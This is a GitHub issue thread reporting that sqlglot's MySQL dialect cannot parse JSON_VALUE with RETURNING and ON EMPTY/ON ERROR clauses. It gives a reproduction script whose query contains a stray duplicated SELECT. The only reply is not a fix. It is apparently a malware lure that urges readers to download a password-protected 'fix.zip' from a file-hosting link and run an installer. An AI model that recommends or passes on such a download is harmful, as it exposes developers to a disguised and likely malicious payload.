### ISSUE TITLE
Missing Support for JSON Path Syntax in MySQL Dialect

### ISSUE THREAD

**Issue by ashishshukla19** [tobymao/sqlglot#3983]
### Description:
SQLGlot MySQL dialect does not support JSON path syntax functions like JSON_VALUE, resulting in a parse failure when attempting to convert a MySQL query to an Abstract Syntax Tree (AST).

### Details:

MySQL JSON Path Syntax Functions

MySQL supports JSON path syntax functions, such as JSON_VALUE, which allow extracting values from JSON documents.
JSON_VALUE Function Syntax
The specific functions and syntax that are not supported include:

**`JSON_VALUE()` Function:**

- **Syntax:**
  ```sql
  JSON_VALUE(json_doc, path [RETURNING type] [on_empty] [on_error])

```
Unsupported Syntax Elements

The specific syntax elements not supported by SQLGlot's MySQL dialect include:

-     RETURNING type
-     on_empty: {NULL | ERROR | DEFAULT value} ON EMPTY
-     on_error: {NULL | ERROR | DEFAULT value} ON ERROR
```
**CODE**
````from sqlglot.dialects.mysql import MySQL
from sqlglot import parse_one

sql = """
SELECT SELECT JSON_VALUE('{"item": "shoes", "price": "49.95"}', '$.price'
     RETURNING DECIMAL(4,2)) AS price;
"""

ast = parse_one(sql, dialect=MySQL)
print(repr(ast))
````

**ERROR** 

**sqlglot.errors.ParseError: Invalid expression / Unexpected token. Line 2, Col: 13.**

 [   link](https://dev.mysql.com/doc/refman/8.4/en/json-search-functions.html) for the documetation

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
